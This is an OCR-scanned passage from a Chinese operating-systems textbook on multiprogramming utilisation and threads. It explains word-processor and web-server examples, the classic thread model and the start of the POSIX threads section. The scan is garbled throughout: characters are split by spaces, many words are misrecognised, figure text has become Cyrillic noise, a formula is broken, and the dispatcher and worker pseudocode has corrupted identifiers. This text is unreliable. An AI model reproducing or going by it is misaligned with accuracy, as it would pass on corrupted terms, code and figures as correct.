内 存 ， 操 作 系统 占用 128MB， 每 个 用 户 程序 也 占用 128MB。 这 些 内 存 空间 允许 3 个 用 户 程序 同时 哇 留 在 
内 存 中 。 车 80% 的 时 间 用 于 1/O 等 待 ， 则 CPU 的 利用 率 (忽略 操作 系统 开销 ) 大 约 是 1-0.8?， 即 大 约 49% 
在 增加 512MB 字 节 的 内 存 后 ， 可 从 3 道 程序 设计 提高 到 7 道 程序 设计 ， 因 而 CPU 利 用 率 提高 到 79%。 换 言 
之 ， 第 二 个 512MB 内 存 提高 了 30% 的 吞吐 量 。 

增加 第 三 个 512MB 内 存 只 能 将 CPU 利用 率 从 79% 提 高 到 91%， 春 吐 量 的 提高 仅 为 12%。 通 过 这 一 模 
型 ， 计 算 机 用 户 可 以 确定 第 一 次 增加 内 存 是 一 个 合算 的 投资 而 第 二 个 则 不 是 。 


2.2 线程 

在 传统 操作 系统 中 ， 每 个 进程 有 -个 地 址 空间 和 一 个 控制 线程 。 事 实 上 ， 这 几乎 就 是 进程 的 定义 。 
不 过 ， 经 常 存在 在 同一 个 地 址 空间 中 准 并 行 运行 多 个 控制 线程 的 情形 ， 这 些 线程 就 像 (差不多 ) 分 离 的 
进程 (共享 地 址 空间 除外 )。 在 下 面 各 节 中 ， 我 们 将 讨论 这 些 情形 及 其 实现 。 


2.2.1 线程 的 使 用 

为 什么 人 们 需要 在 一 个 进程 中 再 有 一 类 进程 ? 有 若干 理由 说 明 产生 这 些 迷 你 进程 ( 称 为 线程 ) 的 必 
要 性 。 下 面 我 们 来 讨论 其 中 一 些 理由 。 人 们 需要 多 线程 的 主要 原因 是 ， 在 许多 应 用 中 同时 发 生 着 多 种 活 
动 。 其 中 某 些 活动 随 着 时 间 的 推移 会 被 阻塞 。 通 过 将 这 些 应 用 程序 分 解 成 可 以 准 并 行 运行 的 多 个 顺序 线 
程 ， 程 序 设计 模型 会 变 得 更 简单 。 

在 前 面 我 们 已 经 进行 了 有 关 讨论 。 准 确 地 说 ， 这 正 是 之 前 关于 进程 模型 的 讨论 。 有 了 这 样 的 抽象 ， 
我 们 才 不 必 考 虑 中 断 、 定 时 器 和 上 下 文 切换 ， 而 只 需 考察 并 行进 程 。 类 似 地 ， 只 是 在 有 了 多 线程 概念 之 
后 ， 我 们 才 加 入 了 一 种 新 的 元 素 : 并 行 实体 共享 同一 个 地 址 空间 和 所 有 可 用 数据 的 能 力 。 对 于 某 些 应 用 
而 言 ， 这 种 能 力 是 必需 的 ， 而 这 正 是 多 进程 模型 (它们 具有 不 同 地 址 空间 ) 所 无 法 表达 的 。 

第 二 个 关于 需要 多 线程 的 理由 是 ， 由 于 线程 比 进程 更 轻 量 级 ， 所 以 它们 比 进程 更 容易 〈 即 更 快 ) 创 
建 ， 也 更 容易 撤销 。 在 许多 系统 中 ， 创 建 一 个 线程 较 创建 一 个 进程 要 快 10~100 倍 。 在 有 大 量 线程 需要 动 
态 和 快速 修改 时 ， 具 有 这 一 特性 是 很 有 用 的 。 
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需要 多 线程 的 第 三 个 原因 涉及 性 能 方面 的 讨论 。 车 多 个 线程 都 是 CPU 密集 型 的 ， 那 么 并 不 能 获得 性 
能 上 的 增强 ， 但 是 如 果 存在 着 大 量 的 计算 和 大 量 的 MO 处 理 ， 拥 有 多 个 线程 允许 这 些 活动 彼此 重 登 进行 
从 而 会 加 快 应 用 程序 执行 的 速度 。 

最 后 ， 在 多 CPU 系统 中 ， 多 线程 是 有 益 的 ， 在 这 样 的 系统 中 ， 真 正 的 并 行 有 了 实现 的 可 能 。 我 们 会 
在 第 8 章 讨论 这 个 主题 。 

通过 考察 一 些 典型 例子 ， 我 们 就 可 以 更 清楚 地 看 出 多 线程 的 有 益 之 处 。 作 为 第 一 个 例子 ， 考 虑 一 个 
字 处 理 软件 。 字 处 理 软件 通常 按照 出 现在 打印 页 上 的 格式 在 屏幕 上 精确 显示 文档 。 特 别 地 ， 所 有 的 行 分 
隔 符 和 页 分 隔 符 都 在 正确 的 最 终 位 置 上 ， 这 样 在 需要 时 用 户 可 以 检查 和 修改 文档 (比如 ， 消 除 孤 行 一 一 
在 一 页 上 不 完整 的 顶部 行 和 底部 行 ， 因 为 这 些 行 不 甚 美观 )。 

假设 用 户 正在 写 一 本 书 。 从 作者 的 观点 来 看 ， 最 容易 的 方法 是 把 整 本 书 作为 一 个 文件 ， 这 样 一 来 
查询 内 容 、 完 成 全 局 替换 等 都 非常 容易 。 另 一 种 方法 是 ， 把 每 一 章 都 处 理 成 单独 一 个 文件 。 但 是 ， 在 把 
每 个 小 节 和 子 小 节 都 分 成 单个 的 文件 之 后 ， 若 必须 对 全 书 进行 全 局 的 修改 时 ， 那 就 真是 麻烦 了 ， 因 为 有 
成 百 个 文件 必须 一 个 个 地 编辑 。 例 如 ， 如 果 所 建议 的 某 个 标准 xxxx 正 好 在 书 付 印 之 前 被 批准 了 ， 于 是 
“标准 草案 xxxx” 一 类 的 字眼 就 必须 改 为 “标准 xxxx”"。 如 果 整 本 书 是 一 个 文件 ， 那 么 只 要 一 个 命令 就 可 
以 完成 全 部 的 替换 处 理 。 相 反 ， 如 果 一 本 书 分 成 了 300 个 文件 ， 那 么 就 必须 分 别 对 每 个 文件 进行 编辑 。 

现在 考虑 ， 如 果 有 一 个 用 户 突然 在 一 个 有 800 页 的 文件 的 第 一 页 上 删 掉 了 一 个 语句 之 后 ， 会 发 生 什 
么 情形 。 在 检查 了 所 修改 的 页 面 并 确认 正确 后 ， 这 个 用 户 现在 打算 接着 在 第 600 页 上 进行 另 一 个 修改 ， 
并 键 人 一 条 命令 通知 字 处 理 软件 转 到 该 页 面 (可 能 要 查阅 只 在 那里 出 现 的 一 个 短语 )。 于 是 字 处 理 软件 
被 强制 对 整个 书 的 前 600 页 重新 进行 格式 处 理 ， 这 是 因为 在 排列 该 页 前 面 的 所 有 页 面 之 前 ， 字 处 理 软件 
并 不 知道 第 600 页 的 第 一 行 应 该 在 哪里 。 而 在 第 600 页 的 页 面 可 以 真正 在 屏幕 上 显示 出 来 之 前 ， 计 算 机 可 
能 要 拖延 相当 一 段 时 间 ， 从 而 令 用 户 不 其 满意 。 

多 线程 在 这 里 可 以 发 挥 作用 。 假设 字 处 理 软件 被 编写 成 含有 两 个 线程 的 程序 。 一 个 线程 与 用 户 交互 
而 另 一 个 在 后 台 重新 进行 格式 处 理 。 一 旦 在 第 1 页 中 的 语句 被 删除 掉 ， 交 互 线程 就 立即 通知 格式 化 线程 
对 整 本 书 重新 进行 处 理 。 同 时 ， 交 互 线程 继续 监控 键盘 和 鼠标 ， 并 响应 诸如 滚动 第 1 页 之 类 的 简单 命令 ， 
此 刻 ， 另 一 个 线程 正在 后 台 疯狂 地 运算 。 如 果 有 点 运气 的 话 ， 重 新 格式 化 会 在 用 户 请 求 查看 第 600 页 之 
前 完成 ， 这 样 ， 第 600 页 页 面 就 立即 可 以 在 屏幕 上 显示 出 来 。 

如 果 我 们 已 经 做 到 了 这 一 步 ， 那 么 为 什么 不 再 进一步 增加 一 个 线程 呢 ? 许多 字 处 理 软件 都 有 每 隔 若 
干 分 钟 自动 在 磁盘 上 保存 整个 文件 的 特点 ， 用 于 避免 由 于 程序 崩 油 、 系 统 贿 汕 或 电源 故障 而 造成 用 户 一 
整 天 的 工作 丢失 的 情况 。 第 三 个 线程 可 以 处 理 磁 玲 备份 ， 而 不 必 干 扰 其 他 两 个 线程 。 拥 有 三 个 线程 的 情 
形 ， 如 图 2-7 所 示 。 


ий, == D 


键盘 лот ыыра а >= 磁盘 


图 2-7 有 三 个 线程 的 字 处 理 软件 


如 果 程 序 是 单线 程 的 ， 那 么 在 进行 磁盘 备份 时 ， 来 自 键盘 和 鼠标 的 命令 就 会 被 忽略， 直到 备份 工作 
完成 为 止 。 用 户 当 然 会 认为 性 能 很 差 。 另 一 个 方法 是 ， 为 了 获得 好 的 性 能 ， 可 以 让 键盘 和 鼠标 事件 中 断 
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了 。 第 一 个 线程 只 是 和 用 户 交互 ， 第 二 个 线程 在 得 到 通知 时 进行 文档 的 重新 格式 化 ， 第 三 个 线程 周期 性 
地 将 RAM 中 的 内 容 写 到 磁盘 上 。 

很 显然 ， 在 这 里 用 三 个 不 同 的 进程 是 不 能 工作 的 ， 这 是 因为 三 个 线程 都 需要 在 同一 个 文件 上 进行 操作 
通过 让 三 个 线程 代替 三 个 进程 ， 三 个 线程 共享 公共 内 存 ， 于 是 它们 都 可 以 访问 同一 个 正在 编辑 的 文件 

许多 其 他 的 交互 式 程序 中 也 存在 类 似 的 情形 。 例 如 ， 电 子 表格 是 允许 用 户 维护 矩阵 的 一 种 程序 ， 矩 
阵 中 的 一 些 元 素 是 用 户 提供 的 数据 ， 另 一 些 元 素 是 通过 所 输入 的 数据 运用 可 能 比较 复杂 的 公式 而 得 出 的 
计算 结果 。 当 用 户 改变 一 个 元 素 时 ， 许 多 其 他 元 素 就 必须 重新 计算 。 通 过 一 个 后 台 线 程 进行 重新 计算 的 
方式 ， 交 互 式 线程 就 能 够 在 进行 计算 的 时 候 ， 让 用 户 从 事 更 多 的 工作 。 类 似 地 ， 第 三 个 线程 可 以 在 磁盘 
上 进行 周期 性 的 备份 工作 。 

现在 考虑 另 一 个 多 线程 发 挥 作用 的 例子 : 一 个 万 维 网 服务 器 。 对 页 面 的 请 求 发 给 服务 器 ， 而 所 请 求 
的 页 面 发 回 给 客户 机 。 在 多 数 Web 站 点 上 ， 某 些 页 面 较 其 他 页 面相 比 ， 有 更 多 的 访问 。 例 如 ， 对 Sony 主 
页 的 访问 就 远 远 超过 对 深意 在 页 面 树 里 的 任何 特 
定 摄像 机 的 技术 说 明 书页 面 的 访问 。 利 用 这 一 事 монеае 
实 ，Web 服 务 器 可 以 把 获得 大 量 访问 的 页 面 集合 
保存 在 内 存 中 ， 和 避免 到 磁盘 去 调和 这些 页 面 ， 从 分 派 线程 
THERE, Н Е азаи А 工作 线程 用 户 
(cache) ， 高 速 缓存 也 运用 在 其 他 许多 场合 中 。 空间 
例如 在 第 ! 章 中 介绍 的 CPU 缓存 。 Web 页 面 高 速 缓存 

一 种 组 织 Web 服 务 器 的 方式 如 图 2-8 所 示 。 

在 这 里 ， 一 个 称 为 分 派 程序 (dispatcher) 的 线 ш ТА 
程 从 网 络 中 读 人 工作 请 求 。 在 检查 请 求 之 后 ， 分 空间 
派 线程 挑选 一 个 空转 的 〈 即 被 阻塞 的 ) 工作 线程 网 络 连 接 

(worker thread) ， 提 交 该 请 求 ， 通 常 是 在 每 个 线 

程 所 配 有 的 某 个 专门 字 中 写 人 -一 个 消息 指针 。 接 из 一 个 元 线程 的 Web 服 务 器 

着 分 派 线程 唤醒 睡眠 的 工作 线程 ， 将 它 从 阻塞 状态 转 为 就 结 状态 。 

在 工作 线程 被 唤醒 之 后 ， 它 检查 有 关 的 请 求 是 否 在 Web 页 面 高 速 级 存 之 中 ， 这 个 高 速 缓存 是 所 有 线 
程 都 可 以 访问 的 。 如 果 没有 ， 该 线程 开始 一 个 从 磁盘 调 入 页 面 的 read 操 作 ， 并 且 阻塞 直到 该 磁盘 操作 完 
成 。 当 上 述 线程 阻塞 在 磁盘 操作 上 时 ， 为 了 完成 更 多 的 工作 ， 分 派 线程 可 能 挑选 另 一 个 线程 运行 ， 也 可 
能 把 另 一 个 当前 就 绪 的 工作 线程 投入 运行。 

这 种 模型 允许 把 服务 器 编写 为 顺序 线程 的 一 个 集合 。 在 分 派 线程 的 程序 中 包含 一 个 无 限 循环 ， 该 各 
环 用 来 获得 工作 请 求 并 且 把 工作 请 求 派 给 工作 线程 。 每 个 工作 线程 的 代码 包含 一 个 从 分 派 线程 接收 请 求 
并 且 检 查 Web 高 速 级 存 中 是 否 存在 所 需 页 面 的 无 限 循环 。 如 果 存 在 ， 就 将 该 页 面 返回 给 客户 机 ， 接 着 该 
工作 线程 阻塞 ， 等 待 一 个 新 的 请 求 。 如 果 没有 ， 工 作 线程 就 从 磁盘 调 入 该 页 面 ， 将 该 页 面 返回 给 客户 机 
然后 该 工作 线程 阻塞 ， 等 待 一 个 新 的 请 求 。 

图 2-9 给 出 了 有 关 代码 的 大 致 框架 。 如 同 本 书 的 其 他 部 分 一 样 ， 这 里 假设 TRUE 为 常数 1。 另 外 ，buf 
和 page 分 别 是 保存 工作 请 求 和 Web 页 面 的 相应 结构 。 


while (TRUE) { while (TRUE) { 
get_next_request(&buf); wait_for_work(: 
handoff _work(&buf); look_for_page_in_cache(&buf, раде); 


if(page_not-in .сасһе(8раде)) 
Tead-page_from disk(&buf, &page); 
retum _раде(&раде): 


а) b) 
图 2-9 对 应 图 2-8 的 代码 概要 : a) 分派 线程 ，b) 工作 线程 
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现在 考虑 在 没有 多 线程 的 情形 下 ， 如 何 编写 Web 服 务 器 。 一 种 可 能 的 方式 是 ， 使 其 像 一 个 线程 一 样 
运行 。Web 服 务 器 的 主 循环 获得 请 求 ， 检 查 请 求 ， 并 且 在 取 下 一 个 请 求 之 前 完成 整个 工 
操作 时 ， 服 务 器 就 空转 ， 并 且 不 处 理 任何 到 来 的 其 他 请 求 。 如 果 该 Web 服务 器 运行 在 
常情 形 都 是 这 样 ， 那 么 在 等 待 磁盘 操作 时 CPU 只 能 空转 。 结 果 导 致 每 秒 钟 只 有 很 少 的 请 求 被 处 理 。 可 见 
线程 较 好 地 改善 了 Web 服务 器 的 性 能 ， 而 且 每 个 线程 是 按 通常 方式 顺序 编程 的 。 

到 现在 为 止 ， 我 们 有 了 两 个 可 能 的 设计 : 多 线程 Web 服 务 器 和 单线 程 Web 服 务 器 。 假设 没有 多 线程 
可 用 ， 而 系统 设计 者 又 认为 由 于 单线 程 所 造成 的 性 能 降低 是 不 能 接受 的 ， 那 么 如 果 可 以 使 用 read 系 统 调 
用 的 非 阻塞 版 本 ， 还 存在 第 三 种 可 能 的 设计 。 在 请 求 到 来 时 ， 这 个 惟一 的 线程 对 请 求 进行 考察 。 如 果 该 
请 求 能 够 在 高 速 缓存 中 得 到 满足 ， 那 么 一 切 都 好 ， 如 果 不 能 ， 则 启动 一 个 非 阻塞 的 磁盘 操作 。 

服务 器 在 表格 中 记录 当前 请 求 的 状态 ， 然 后 去 处 理 下 一 个 事件 。 下 一 个 事件 可 能 是 一 个 新 工作 的 请 
求 ， 或 是 磁盘 对 先前 操作 的 回答 。 如 果 是 新 工作 的 请 求 ， 就 开始 该 工作 。 如 果 是 磁盘 的 回答 ， 就 从 表格 
中 取出 对 应 的 信息 ， 并 处 理 该 回答 。 对 于 非 阻塞 磁盘 IO 而 言 ， 这 种 回答 多 数 会 以 信号 或 中 断 的 形式 出 现 。 

在 这 一 设计 中 ， 前 面 两 个 例子 中 的 “顺序 进程 ”模型 消失 了 。 每 次 服务 器 从 为 某 个 请 求 工作 的 状态 
切换 到 另 一 个 状态 时 ， 都 必须 显 式 地 保存 或 重新 装 入 相应 的 计算 状态 。 事 实 上 ， 我 们 以 一 种 困难 的 方式 
模拟 了 线程 及 其 堆栈 。 这 里 ， 每 个 计算 都 有 一 个 被 保存 的 状态 ， 存 在 一 个 会 发 生 且 使 得 相关 状态 发 生 改 
变 的 事件 集合 ， 我 们 把 这 类 设计 称 为 有 限 状态 机 (finite-state machine)。 有 限 状态 机 这 一 概念 广泛 地 应 
用 在 计算 机 科学 中 。 

现在 很 清楚 多 线程 必须 提供 的 是 什么 了 。 多 线程 使 得 顺序 进程 的 思想 得 以 保留 下 来 ， 这 种 顺序 进程 
阻塞 了 系统 调用 (如 磁盘 IO) ， 但 是 仍旧 实现 了 并 行 性 。 对 系统 调用 进行 阻塞 使 程序 设计 变 的 较为 简单 ， 
而 且 并 行 性 改善 了 性 能 。 单 线程 服务 器 虽然 保留 了 阻 宕 系统 调用 的 简易 性 ， 但 是 却 放弃 了 性 能 。 第 三 种 
处 理 方法 运用 了 非 阻塞 调用 和 中 断 ， 通 过 并 行 性 实现 了 高 性 能 ， 但 是 给 编程 增加 了 困难 。 在 图 2-10 中 给 
出 了 上 述 模式 的 总 结 。 


[模型 Hes M ooo 
多 线程 阻塞 系统 调用 ] 
_ 单 线程 进程 ”| ж}, ВЖЖ 

| 有限 状态 机 并 行 性 、 排 阴 案 系统 调用 中断 


图 2-10 构造 服务 器 的 三 种 方法 


有 关 多 线程 作用 的 第 三 个 例子 是 那些 必须 处 理 极 大 量 数据 的 应 用 。 通 常 的 处 理 方式 是 ， 读 进 一 块 数 
据 ， 对 其 处 理 ， 然 后 再 写 出 数据 。 这 里 的 问题 是 ， 如 果 只 能 使 用 阻塞 系统 调用 ， 那么 在 数据 进入 和 数据 
输出 时 ， 会 阻塞 进程 。 在 有 大 量 计算 需要 处 理 的 时 候 ， 让 CPU 空转 显然 是 浪费 ， 应 该 尽 可 能 避免 。 

多 线程 提供 了 一 种 解决 方案 , 有 关 的 进程 可 以 用 一 个 输入 线程 、 一 个 处 理 线程 和 一 个 输出 线程 构造 。 
输入 线程 把 数据 读 人 到 输入 缓冲 区 中 ， 处 理 线程 从 输入 缓冲 区 中 取出 数据 ， 处 理 数据 ， 并 把 结果 放 到 输 
出 缓冲 区 中 ， 输出 线程 把 这 些 结果 写 到 磁盘 上 。 按 照 这 种 工作 方式 ， 输 入 、 处 理 和 输出 可 以 全 部 同时 进 
行 。 当 然 ， 这 种 模型 只 有 当 系统 调用 只 阻塞 调用 线程 而 不 是 阻塞 整个 进程 时 ， 才 能 正常 工作 。 


2.2.2 经 典 的 线程 模型 

既然 我 们 已 经 明白 为 什么 线程 会 有 用 以 及 如 何 使 用 它们 ， 不 如 让 我 们 用 更 近 - 步 的 眼光 来 审查 一 下 
上 面 的 想法 。 进 程 模型 基于 两 种 独立 的 概念 : 资源 分 组 处 理 与 执行 。 有 时 ， 将 这 两 种 概念 分 开会 更 有 益 ， 
这 也 引入 了 “线程 ”这 一 概念 。 我 们 将 先 来 看 经 典 的 线程 模型 ， 之 后 我 们 会 来 研究 “模糊 进程 与 线程 分 
界线 ”的 Linux 线 程 模型 。 

理解 进程 的 一 个 角度 是 ， 用 某 种 方法 把 相关 的 资源 集中 在 一 起 。 进 程 有 存放 程序 正文 和 数据 以 及 其 
他 资源 的 地 址 空间 。 这 些 资源 中 包括 打开 的 文件 、 子 进程 、 即 将 发 生 的 报警 、 信号 处 理 程序 、 账 号 信息 
等 。 把 它们 都 放 到 进程 中 可 以 更 容易 管理 。 

另 一 个 概念 是 ,进程 拥有 一 个 执行 的 线程 ,通常 简 写 为 线程 (thread)。 在 线程 中 有 一 个 程序 计数 器 ， 
用 来 记录 接着 要 执行 哪 一 条 指令 。 线 程 拥有 寄存 器 ， 用 来 保存 线程 当前 的 工作 变量 。 线 程 还 拥有 -- 个 堆 
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栈 ， 用 来 记录 执行 历史 ， 其 中 每 一 帧 保存 了 一 个 已 调用 的 但 是 还 没有 从 中 返回 的 过 程 。 尽 管线 程 必 须 在 
某 个 进程 中 执行 ,但 是 线程 和 它 的 进程 是 不 同 的 概念 ， 并 且 可 以 分 别处 理 。 进 程 用 于 把 资源 集中 到 一 起 ， 
而 线程 则 是 在 CPU 上 被 调度 执行 的 实体 。 

线程 给 进程 模型 增加 了 一 项 内 容 ， 即 在 同一 个 进程 环境 中 ， 允 许 彼此 之 间 有 较 大 独立 性 的 多 个 线程 
执行 。 在 同一 个 进程 中 并 行 运行 多 个 线程 ， 是 对 在 同一 台 计算 机 上 并 行 运行 多 个 进程 的 模拟 。 在 前 -种 
情形 下 ， 多 个 线程 共享 同一 个 地 址 空间 和 其 他 资源 。 而 在 后 一 种 情形 中 ， 多 个 进程 共享 物理 内 存 、 磁 盘 、 
打印 机 和 其 他 资源 。 由 于 线程 具有 进程 的 某 些 性 质 ， 所 以 有 时 被 称 为 轻 量 级 进程 lightweight process), 
多 线程 这 个 术语 ， 也 用 来 描述 在 同一 个 进程 中 人 允许 多 个 线程 的 情形 。 正 如 我 们 在 第 1 章 中 看 到 的 ， 一 些 
CPU 已 经 有 直接 硬件 支持 多 线程 ， 并 允许 线程 切换 在 纳 秒 级 完成 。 

在 图 2-11a 中 ， 可 以 看 到 三 个 传统 的 进程 。 每 个 进程 有 自己 的 地 址 空间 和 单个 控制 线程 。 相 反 ， 在 
图 2-11b 中 ， 可 以 看 到 一 个 进程 带 有 三 个 控制 线程 。 尽 管 在 两 种 情形 中 都 有 三 个 线程 ， 但 是 在 图 2-11a 中 ， 
每 一 个 线程 都 在 不 同 的 地 址 空间 中 运行 ， 而 在 图 2-11b 中 ， 这 三 个 线程 全 部 在 相同 的 地 址 空间 中 运行 。 

当 多 线程 进程 在 单 CPU 系 统 中 运行 时 ， 线 程 轮流 运行 。 在 图 2-1 中 ， 我 们 已 经 看 到 了 进程 的 多 道 程 
序 设计 是 如 何 工作 的 。 通 过 在 多 个 进程 之 间 来 回 切 换 ， 系统 制造 了 不 同 的 顺序 进程 并 行 运行 的 假象 。 多 
线程 的 工作 方式 也 是 类 似 的 。CPU 在 线程 之 间 的 快速 切换 ， 制造 了 线程 并 行 运行 的 假象 ， 好 似 它们 在 一 
个 比 实际 CPU 慢 一 些 的 CPU 上 同时 运行 。 在 一 个 有 三 个 计算 密集 型 线程 的 进程 中 ， 线程 以 并 行 方式 运行 ， 
每 个 线程 在 一 个 CPU 上 得 到 了 真实 CPU 速度 的 三 分 之 一 。 


进程 1 进程 2 进程 3 进程 
“IR. 
ав 线程 

явен | ГТ | 内 村 


а) b) 


图 2-11 а) 三 个 进程 ， 每 个 进程 有 一 个 线程 ，b) 一 个 进程 带 三 个 线程 


进程 中 的 不 同 线程 不 像 不 同 进程 之 间 那 样 存在 很 大 的 独立 性 。 所 有 的 线程 都 有 完全 一- 样 的 地 址 空间 ， 
这 意味 着 它们 也 共享 同样 的 全 局 变量 。 由 于 各 个 线程 都 可 以 访问 进程 地 址 空间 中 的 每 一 个 内 存 地 址 ， 所 
以 一 个 线程 可 以 读 、 写 或 其 至 清除 另 一 个 线程 的 堆栈 。 线 程 之 间 是 没有 保护 的 ， 原因 是 1) 不 可 能 ， 
2) 也 没有 必要 。 这 与 不 同 进程 是 有 差别 的 。 不 同 的 进程 会 来 自 不 同 的 用 户 ， 它们 彼此 之 间 可 能 有 政 意 ， 
一 个 进程 总 是 由 某 个 用 户 所 拥有 ， 该 用 户 创建 多 个 线程 应 该 是 为 了 它们 之 间 的 合作 而 不 是 彼此 间 争 斗 。 
除了 共享 地 址 空间 之 外 ， 所 有 线程 还 共享 同一 个 打开 文件 集 、 子 进程 、 报警 以 及 相关 信号 等 ， 如 图 2-12 
所 示 。 这 样 ， 对 于 三 个 没有 关系 的 线程 而 言 ， 应 该 使 用 图 2-11a 的 结构 ， 而 在 三 个 线程 实际 完成 同一 个 
作业 ， 并 彼此 积极 密切 合作 的 情形 中 ， 图 2-1lb 则 比较 合适 。 


每 个 进程 中 的 内 容 每 个 线程 中 的 内 容 
地 址 空间 程序 计数 器 

全 局 变量 寄存 器 

打开 文件 堆栈 

进程 状态 
即将 发 生 的 报警 

信号 与 信号 处 理 程序 

账户 信息 


图 2-12 第 一 列 给 出 了 在 一 个 进程 中 所 有 线程 共享 的 内 容 ， 第 二 列 给 出 了 每 个 线程 自己 的 内 容 
图 2-12 中 ， 第 一 列表 项 是 进程 的 属性 ， 而 不 是 线程 的 属性 。 例 如 ， 如 果 一 个 线程 打开 了 一 个 文件 ， 
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该 文件 对 该 进程 中 的 其 他 线程 都 可 见 ， 这 些 线程 可 以 对 该 文件 进行 读 写 。 由 于 资源 管理 的 单位 是 进程 而 
非 线程 ， 所 以 这 种 情形 是 合理 的 。 如 果 每 个 线程 有 其 自己 的 地 址 空间 、 打 开 文件 、 即 将 发 生 的 报 区 等 
那么 它们 就 应 该 是 不 同 的 进程 了 。 线 程 概念 试图 实现 的 是 ， 共 享 一 组 资源 的 多 个 线程 的 执行 能 力 ， 以 便 
这 些 线程 可 以 为 完成 某 一 任务 而 共同 工作 。 

和 传统 进程 一 样 ( 即 只 有 一 个 线程 的 进程 )， 线 程 可 以 处 于 若干 种 状态 的 任何 一 个 运行、 阻塞、 
就 缚 或 终止 。 正 在 运行 的 线程 拥有 CPU 并 且 是 活路 线程 2 
的 。 被 阻 密 的 线程 正在 等 待 某 个 释放 它 的 事件 。 例 
如 , 当 一 个 线程 执行 从 键盘 读 人 数据 的 系统 调用 时 ， 

该 线程 就 被 朋 骞 直到 键入 了 输入 为 止 。 线 程 可 以 被 
阻塞 ， 以 便 等 待 某 个 外 部 事件 的 发 生 或 者 等 待 其 他 
线程 来 释放 它 。 就 绪 线 程 可 被 调度 运行 ， 并 且 只 要 др 
轮 到 它 就 很 快 可 以 运行 。 线 程 状态 之 间 的 转换 和 进 mer -| 
程 状态 之 间 的 转换 是 一 样 的 ， 如 图 2-2 所 示 。 

认识 到 每 个 线程 有 其 自己 的 堆栈 很 重要 ， 如 图 
2-13 所 示 。 每 个 线程 的 堆栈 有 一 帧 ， 供 各 个 被 调用 
但 是 还 没有 从 中 返回 的 过 程 使 用 。 在 该 帧 中 存放 了 PER = 
相应 过 程 的 局 部 变量 以 及 过 程 调用 完成 之 后 使 用 的 ноз ераникаанан 
返回 地 址 。 例 如 ， 如 果 过 程 X 调 用 过 程 Y， 而 Y 又 调用 Z， 那 么 当 Z 执 行 时 ， 供 X、Y 和 2Z 使 用 的 帧 会 全 部 
存在 堆栈 中 。 通 常 每 个 线程 会 调用 不 同 的 过 程 ， 从 而 有 一 个 各 自 不 同 的 执行 历史 。 这 就 是 为 什么 每 个 线 
程 需要 有 自己 的 堆栈 的 原因 。 

在 多 线程 的 情况 下 ， 进 程 通常 会 从 当前 的 单个 线程 开始 。 这 个 线程 有 能 力 通过 调用 一 个 库 函 数 〔 如 
thread_create) 创建 新 的 线程 。thread_ereate 的 参数 专门 指定 了 新 线程 要 运行 的 过 程 名 。 这 里 ， 没 有 必要 
对 新 线程 的 地 址 空间 加 以 规定 ， 因 为 新 线程 会 自动 在 创建 线程 的 地 址 空间 中 运行 。 有时， 线程 是 有 层次 
的 ， 它 们 具有 一 种 父子 关系 ， 但 是 ， 通 常 不 存在 这 样 一 种 关系 ， 所 有 的 线程 都 是 平等 的 。 不 论 有 无 层次 
关系 ， 创 建 线程 通常 都 返回 一 个 线程 标识 符 ， 该 标识 符 就 是 新 线程 的 名 字 。 

当 一 个 线程 完成 工作 后 ， 可 以 通过 调用 一 个 库 过 程 (如 thread_exit) 退出 。 该 线程 接着 消失 ， 不 再 
可 调度 。 在 某 些 线程 系统 中 ， 通 过 调用 一 个 过 程 ， 例 如 thread_join， 一 个 线程 可 以 等 待 一 个 (特定) 线 
程 退 出 。 这 个 过 程 阻塞 调用 线程 直到 那个 (特定) 线程 退出 。 在 这 种 情况 下 ， 线 程 的 创建 和 终止 非常 类 
似 于 进程 的 创建 和 终止 ， 并 且 也 有 着 同样 的 选项 。 

另 一 个 常见 的 线程 调用 是 thread_yield， 它 允许 线程 自动 放弃 CPU 从 而 让 另 一 个 线程 运行 。 这 样 一 个 
调用 是 很 重要 的 ， 因 为 不 同 于 进程 ，( 线 程 库 ) 无 法 利用 时 钟 中 断 强制 线程 让 出 CPU。 所 以 设法 使 线程 行 
为 “高 尚 ”起 来 ， 并 且 随 者 时 间 的 推移 自动 交 出 CPU， 以 便 让 其 他 线程 有 机 会 运行 ， 就 变 得 非常 重要 
有 的 调用 人 允许 某 个 线程 等 待 另 一 个 线程 完成 某 些 任务 ， 或 等 待 一 个 线程 宣称 它 已 经 完成 了 有 关 的 工作 等 。 

通常 而 言 ， 线 程 是 有 益 的 ， 但 是 线程 也 在 程序 设计 模式 中 引入 了 某 种 程度 的 复杂 性 。 考 虐 一 下 
UNIX 中 的 fork 系 统 调用 。 如 果 父 进程 有 多 个 线程 ， 那 么 它 的 子 进程 也 应 该 拥有 这 些 线程 吗 ” 如 果 不 是 
则 该 子 进程 可 能 会 工作 不 正常 ， 因 为 在 该 子 进程 中 的 线程 都 是 绝对 必要 的 。 

然而 ， 如 果子 进程 拥有 了 与 父 进程 一 样 的 多 个 线程 ， 如 果 父 进程 在 read 系 统 调用 (比如 键盘 ) 上 被 
阻塞 了 会 发 生 什么 情况 ? 是 两 个 线程 被 阻塞 在 键盘 上 (一 个 属于 父 进程 ， 另 一 个 属于 子 进程 ) 吗 ?在 键 
人 一 行 输入 之 后 ， 这 两 个 线程 都 得 到 该 输入 的 副本 吗 ? 还 是 仅 有 父 进程 得 到 该 输入 的 副本 ? 或 是 仅 有 子 
进程 得 到 ? 类 似 的 问题 在 进行 网 络 连接 时 也 会 出 现 。 

另 一 类 问题 和 线程 共享 许多 数据 结构 的 事实 有 关 。 如 果 一 个 线程 关闭 了 某 个 文件 ， 而 另 一 个 线程 还 
在 该 文件 上 进行 读 操作 时 会 怎样 假设 有 一 个 线程 注意 到 几乎 没有 内 存 了 ， 并 开始 分 配 更 多 的 内 存 。 在 
工作 一 半 的 时 候 ， 发 生 线程 切换 ， 新 线程 也 注意 到 几乎 没有 内 存 了 ， 并 且 也 开始 分 配 更 多 的 内 存 。 这 样 
内 存 可 能 会 分 配 两 次 。 不 过 这 些 问 题 通过 努力 是 可 以 解决 的 。 总 之 ， 要 使 多 线程 的 程序 正确 工作 ， 就 需 
机 仔细 思考 和 设计 
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2.2.3 POSIX 线 程 

为 实现 可 移植 的 线程 程序 ，IEEE 在 IEEE 标 准 1003.1c 中 定义 了 线程 的 标准 。 它 定义 的 线程 包 叫做 
Pthread。 大 部 分 UNIX 系 统 都 支持 该 标准 。 这 个 标准 定义 了 超过 60 个 函数 调用 ， 如 果 在 这 里 列举 - - 遍 就 
太 多 了 。 取 而 代 之 的 是 ， 我 们 将 仅仅 描述 一 些 主要 的 函数 ， 以 说 明 它 是 如 何 工作 的 。 图 2-14 中 列举 了 这 
些 函 数 调用 。 

